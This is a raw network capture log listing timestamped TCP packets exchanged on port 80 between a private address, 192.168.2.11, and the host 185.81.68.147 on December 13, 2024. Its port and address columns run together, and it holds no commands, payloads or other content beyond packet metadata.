                                                                                                                                                                                                Dec 13, 2024 08:20:09.223233938 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.223601103 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.223613977 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.223625898 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.223639965 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.223661900 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.223664045 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.223685026 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.223711967 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.223769903 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.223820925 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.223844051 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.223886967 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.225267887 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.225315094 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.225439072 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.225476980 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.226284027 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.226330042 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.226422071 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.226464033 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.227058887 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.227072001 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.227096081 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.227123022 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.228153944 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.228198051 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.228348017 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.228385925 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.228986025 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.229026079 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.229161978 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.229206085 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.229949951 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.229991913 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.230113029 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.230148077 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.230926037 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.230978012 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.231067896 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.231112003 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.231885910 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.231930017 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.232026100 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.232085943 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.232881069 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.232928991 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.233072042 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.233129025 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.233865023 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.233906984 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.234016895 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.234052896 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.234879017 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.234893084 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.234919071 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.234958887 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.235821009 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.235874891 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.235970020 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.236011028 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.236903906 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.236916065 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.236943007 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.236970901 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.237705946 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.237757921 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.237850904 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.237945080 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.238795042 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.238842010 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.238954067 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.239000082 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.239778996 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.239823103 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.239948988 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.239999056 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.240781069 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.240823984 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.240941048 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.240978956 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.241674900 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.241719961 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.241904020 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.241945028 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.242645979 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.242733002 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.242814064 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.242901087 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.243733883 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.243747950 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.243779898 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.243810892 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.244677067 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.244723082 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.244839907 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.244879961 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.245692968 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.245707035 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.245731115 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.245760918 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.246637106 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.246699095 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.246786118 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.246824026 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.247561932 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.247610092 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.247723103 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.247762918 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.248563051 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.248610973 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.248748064 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.248786926 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.249500036 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.249541044 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.249656916 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.249713898 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.265444994 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.265480042 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.265556097 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.265557051 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.265841961 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.265893936 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.266124010 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.266175032 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.266226053 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.266267061 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.266956091 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.267004013 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.267052889 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.267117977 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.267916918 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.267966986 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.268009901 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.268098116 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.268915892 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.268966913 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.269043922 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.269088984 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.269908905 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.269964933 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.269999981 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.270040035 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.270859957 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.270917892 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.302663088 CET8049948185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.302799940 CET4994880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.397262096 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.397289991 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.397334099 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.397396088 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.397658110 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.397701979 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.397746086 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.397792101 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.398616076 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.398672104 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.398705006 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.398742914 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.399600029 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.399645090 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.399689913 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.399733067 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.400630951 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.400676012 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.400729895 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.400772095 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.401578903 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.401633024 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.401674986 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.401717901 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.402535915 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.402621984 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.402667046 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.402707100 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.403518915 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.403572083 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.403584957 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.403626919 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.404506922 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.404551029 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.404603958 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.404645920 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.405493021 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.405548096 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.405597925 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.405638933 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.406475067 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.406562090 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.406601906 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.406644106 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.407427073 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.407474041 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.407526016 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.407569885 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.408438921 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.408483028 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.408521891 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.408561945 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.409413099 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.409466982 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.409533978 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.409569025 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.410384893 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.410428047 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.410487890 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.410526037 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.411375999 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.411417961 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.411453962 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.411497116 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.412341118 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.412390947 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.412429094 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.412472010 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.413403988 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.413453102 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.413489103 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.413528919 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.414313078 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.414354086 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.414417982 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.414450884 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.415307999 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.415354967 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.415393114 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.415443897 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.416275024 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.416327000 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.416383028 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.416416883 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.417216063 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.417263031 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.417345047 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.417386055 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.418241024 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.418293953 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.418324947 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.418369055 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.419218063 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.419265032 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.419296980 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.419337034 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.420241117 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.420294046 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.420325041 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.420428991 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.421185970 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.421236038 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.421291113 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.421327114 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.422156096 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.422210932 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.422372103 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.422411919 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.422559977 CET8049948185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.423194885 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.423233986 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.423249960 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.423291922 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.424120903 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.424170017 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.424249887 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.424295902 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.425228119 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.425280094 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.425339937 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.425411940 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.426101923 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.426152945 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.426217079 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.426254034 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.427067995 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.427115917 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.427155018 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.427195072 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.428109884 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.428144932 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.428158998 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.428184986 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.429008961 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.429070950 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.429126978 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.429174900 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.429996014 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.430042028 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.430094957 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.430136919 CET4993880192.168.2.11185.81.68.147
